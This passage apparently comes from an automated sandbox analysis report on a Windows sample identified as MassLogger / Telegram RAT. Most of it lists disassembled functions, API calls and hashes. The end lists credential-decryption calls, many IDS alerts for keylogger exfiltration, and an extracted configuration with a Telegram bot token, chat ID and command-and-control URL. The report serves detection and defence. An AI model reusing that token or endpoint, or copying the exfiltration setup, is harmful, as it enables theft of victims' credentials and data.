Opcode Fuzzy Hash: df6e64e4f6769b316d4c1c7beb25aaa03b2c49ca2ab4503c480f7fe4b4eab687
Instruction Fuzzy Hash: B4F0F439109E5116D62233365D09BEF0548CF82354B5A853BFC91B22D2DB3C8A539DFE

Function 004053C4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 004053F3
CallWindowProcW.USER32(?,?,?,?), ref: 00405444

Part of subcall function 004043AB: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004043BD

Strings

, xrefs: 004053D4

Memory Dump Source

Source File: 00000003.00000002.3283685650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3283668198.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3283760223.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3283775713.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3283827776.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_2CQ2zMn0hb.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 36caebe1fe8aa1eff7ff321662443c514d6827d4f2801b7b393fcb4226acda68
Instruction ID: 343f6187318c33bb175646012d6cb398530476c6c15fe8dd96994d534b9a6b17
Opcode Fuzzy Hash: 36caebe1fe8aa1eff7ff321662443c514d6827d4f2801b7b393fcb4226acda68
Instruction Fuzzy Hash: CC0171B1200609ABDF305F11DD84B9B3666EBD4356F508037FA00761E1C77A8DD29A6E

Function 00405F0D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00405F2B
GetTempFileNameW.KERNEL32(?,?,00000000,?,?,?,00435000,004034A3,00437000,00437800,00437800,00437800,00437800,00437800,75923420,004036EF), ref: 00405F46

Strings

nsa, xrefs: 00405F1A

Memory Dump Source

Source File: 00000003.00000002.3283685650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3283668198.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3283760223.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3283775713.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3283827776.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_2CQ2zMn0hb.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: nsa
API String ID: 1716503409-2209301699
Opcode ID: 0c62091ad8b50aef506abc269e58e4a43f33256201187c1c154fac6de66d8f01
Instruction ID: 076564571966e4dc9ef4834731be4d502634ae0aeddccfca5b4533d1bab5a213
Opcode Fuzzy Hash: 0c62091ad8b50aef506abc269e58e4a43f33256201187c1c154fac6de66d8f01
Instruction Fuzzy Hash: 14F09076601204FFEB009F59ED05E9BB7A8EB95750F10803AEE00F7250E6B49A548B68

Function 004059D1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426730,Error launching installer), ref: 004059FA
CloseHandle.KERNEL32(?), ref: 00405A07

Strings

Error launching installer, xrefs: 004059E4

Memory Dump Source

Source File: 00000003.00000002.3283685650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3283668198.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3283760223.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3283775713.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3283827776.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_2CQ2zMn0hb.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: 6d78ed6c6b667bfe634139d4e18f22187190c1a967eebebbcf2d401a0833c7e8
Instruction ID: 166b032e71181ba573d10d742cd21a74b10ba840f41c43b266edefbe5b435367
Opcode Fuzzy Hash: 6d78ed6c6b667bfe634139d4e18f22187190c1a967eebebbcf2d401a0833c7e8
Instruction Fuzzy Hash: E5E04FB0A102097FEB009B64ED49F7B76ACFB04208F404531BD00F2150D774A8208A7C

Function 00406F27 Relevance: 5.2, APIs: 4, Instructions: 236COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3283685650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3283668198.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3283760223.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3283775713.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3283827776.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_2CQ2zMn0hb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db40346bc9fd20083a39152eff8b5ac78f5cdc0ebc59631a5c9ad52422038ace
Instruction ID: 2bd06e12bed6e0bcd81d630d0cd78bd49004ac77cb8b5ebb757de7108a839e92
Opcode Fuzzy Hash: db40346bc9fd20083a39152eff8b5ac78f5cdc0ebc59631a5c9ad52422038ace
Instruction Fuzzy Hash: 1DA14471E04228CBDF28CFA8C8446ADBBB1FF44305F14806ED856BB281D7786A86DF45

Function 00407128 Relevance: 5.2, APIs: 4, Instructions: 208COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3283685650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3283668198.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3283760223.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3283775713.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3283827776.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_2CQ2zMn0hb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d32937a43efcd2dea5d1fc698e3fcc0023127280f8acdc5c544d8c7d1790a46
Instruction ID: f1da02a2f8b93330a3d469e31e6e9edf047fa596270f1f1d86c95cc791e20b04
Opcode Fuzzy Hash: 9d32937a43efcd2dea5d1fc698e3fcc0023127280f8acdc5c544d8c7d1790a46
Instruction Fuzzy Hash: AA910271E04228CBEF28CF98C8447ADBBB1FB45305F14816AD856BB291C778A986DF45

Function 00406E3E Relevance: 5.2, APIs: 4, Instructions: 205COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3283685650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3283668198.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3283760223.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3283775713.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3283827776.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_2CQ2zMn0hb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67d6f810e310069c411d265ffcddf6abea8090fb20e8d2db1667143610fe5bd5
Instruction ID: fb1d02f26201205f5bfcbd3029eb7cfad7cca69a3f8c46de7b35964bdd0c3f7d
Opcode Fuzzy Hash: 67d6f810e310069c411d265ffcddf6abea8090fb20e8d2db1667143610fe5bd5
Instruction Fuzzy Hash: 18814571E04228DFDF24CFA8C844BADBBB1FB45305F24816AD856BB291C7389986DF45

Function 00406943 Relevance: 5.2, APIs: 4, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3283685650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3283668198.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3283760223.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3283775713.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3283827776.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_2CQ2zMn0hb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5328a0701a0a32b67c374057837e60552721ea1a6811a44abe83e42546375677
Instruction ID: 55fc176551b00f8465723d30588461dcf2fc1d3195b414c524ee7a2fcbdbe87b
Opcode Fuzzy Hash: 5328a0701a0a32b67c374057837e60552721ea1a6811a44abe83e42546375677
Instruction Fuzzy Hash: 39815971E04228DBEF24CFA8C844BADBBB1FB45305F14816AD856BB2C1C7786986DF45

Function 00406D91 Relevance: 5.2, APIs: 4, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3283685650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3283668198.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3283760223.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3283775713.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3283827776.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_2CQ2zMn0hb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a445a859154d96951751bba7131c1a69e0b73c0895ac35a4e96b2d7ee743491b
Instruction ID: 7645ab34ef40ba223d211dbe726f8302725d3f31b3e808d93cc70016d3e0d248
Opcode Fuzzy Hash: a445a859154d96951751bba7131c1a69e0b73c0895ac35a4e96b2d7ee743491b
Instruction Fuzzy Hash: 10711471E04228DBDF24CF98C8447ADBBB1FF49305F15806AD856BB281C7389A86DF45

Function 00406EAF Relevance: 5.2, APIs: 4, Instructions: 170COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3283685650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3283668198.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3283760223.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3283775713.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3283827776.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_2CQ2zMn0hb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd7d90a79d0f10410712768d5bba8e0713d9e8f593557aa9bf16db43d4616d0f
Instruction ID: a4e19b7408f2815589132e7e2b866ae2b9c8caa40868d81b8a4623295251dea3
Opcode Fuzzy Hash: cd7d90a79d0f10410712768d5bba8e0713d9e8f593557aa9bf16db43d4616d0f
Instruction Fuzzy Hash: 0D712571E04218DBEF28CF98C844BADBBB1FF45305F15806AD856BB281C7389986DF45

Function 00406DFB Relevance: 5.2, APIs: 4, Instructions: 168COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3283685650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3283668198.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3283760223.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3283775713.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3283827776.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_2CQ2zMn0hb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08b8d2b65a0c1c30b5e83c7ea62cdb0658c0fab8542c410d93f606ef21acc8e7
Instruction ID: 979076adb26e5f1e3e7a9458f232081f51f9a0722543042d1d726f4d31452a21
Opcode Fuzzy Hash: 08b8d2b65a0c1c30b5e83c7ea62cdb0658c0fab8542c410d93f606ef21acc8e7
Instruction Fuzzy Hash: 50714871E04228DBEF28CF98C8447ADBBB1FF45305F15806AD856BB281C7386A46DF45

Function 00161A40 Relevance: 5.1, Strings: 4, Instructions: 98COMMON

Download Yara Rule

Strings

Xaq, xrefs: 00161A76
Xaq, xrefs: 00161B7C
Xaq, xrefs: 00161AB0
Xaq, xrefs: 00161B2F

Memory Dump Source

Source File: 00000003.00000002.3283558363.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_160000_2CQ2zMn0hb.jbxd

Similarity

API ID:
String ID: Xaq$Xaq$Xaq$Xaq
API String ID: 0-4015495023
Opcode ID: 78e84299092b22e347fb1ef3da7efbf56738a6e020586462f942bb3b72f999b8
Instruction ID: d0932c7e45d583259275ee1318d8f83b5ee2e164a1a3b18531ac185df81bda38
Opcode Fuzzy Hash: 78e84299092b22e347fb1ef3da7efbf56738a6e020586462f942bb3b72f999b8
Instruction Fuzzy Hash: B8318030E0121A9FDF658FB9CD403AEBAB6BF84310F1940A9C815A7254EB70CD95DB92

Function 001658E8 Relevance: 5.0, Strings: 4, Instructions: 49COMMON

Download Yara Rule

Strings

\;]q, xrefs: 00165926
\;]q, xrefs: 0016591A
\;]q, xrefs: 001658FE
\;]q, xrefs: 001658F4

Memory Dump Source

Source File: 00000003.00000002.3283558363.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_160000_2CQ2zMn0hb.jbxd

Similarity

API ID:
String ID: \;]q$\;]q$\;]q$\;]q
API String ID: 0-2351511683
Opcode ID: e4cd259a7335f4fb89384a10b153eb6c6cbefaec9de186159f5a471b1d0b5c98
Instruction ID: f76c8724b9a3b84dfbcdeaa467bc0c631769f37ac3b2c0d2e4a37d53c9ac6b21
Opcode Fuzzy Hash: e4cd259a7335f4fb89384a10b153eb6c6cbefaec9de186159f5a471b1d0b5c98
Instruction Fuzzy Hash: F4018431740915CFCB688E2DCC9092577EBAF88778B254569E445CB374DB31DC51C790

Function 00405E43 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E53
lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405E6B
CharNextA.USER32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E7C
lstrlenA.KERNEL32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E85

Memory Dump Source

Source File: 00000003.00000002.3283685650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3283668198.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3283760223.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3283775713.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3283827776.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_2CQ2zMn0hb.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
Instruction ID: 3eb9f18af2c16f81f4dc7877ab3147293eaebe45f2d41041cd024b5e05e36bdf
Opcode Fuzzy Hash: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
Instruction Fuzzy Hash: 4AF0C831100514AFC7029B94DD4099FBBA8DF06354B25407AE844FB211D634DF01AB98

Source: 00000003.00000002.3306564434.000000003491B000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: MassLogger {"EXfil Mode": "Telegram", "Telegram Token": "7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA", "Telegram Chatid": "2065242915"}
Source: 2CQ2zMn0hb.exe.2672.3.memstrmin	Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendMessage"}

Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 3_2_348AD1EC CryptUnprotectData,		3_2_348AD1EC
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 3_2_348AD9D9 CryptUnprotectData,		3_2_348AD9D9

Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:50008 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49998 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:50008 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:49998 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:50010 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:50010 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49912 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:50012 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:50012 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:50038 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:50038 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:50056 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:50056 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49952 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:49912 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49996 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49994 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:49952 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:50058 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:49994 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:50058 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49966 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:49966 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:49996 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:50028 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:50032 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:50028 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:50032 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:50018 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:50018 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:50030 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:50030 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49939 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:49939 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49992 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:49992 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:50016 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:50016 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:50020 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49924 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:50026 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:49924 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:50026 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:50020 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:50064 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49978 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:49978 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:50064 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:50046 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:50046 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:50060 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:50048 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:50060 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:50048 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:50000 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:50000 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:50022 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:50022 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:50014 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:50042 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:50014 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:50042 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:50006 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:50006 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:50034 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:50050 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:50050 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:50054 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:50054 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:50004 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:50034 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:50004 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:50052 -> 149.154.167.220:443
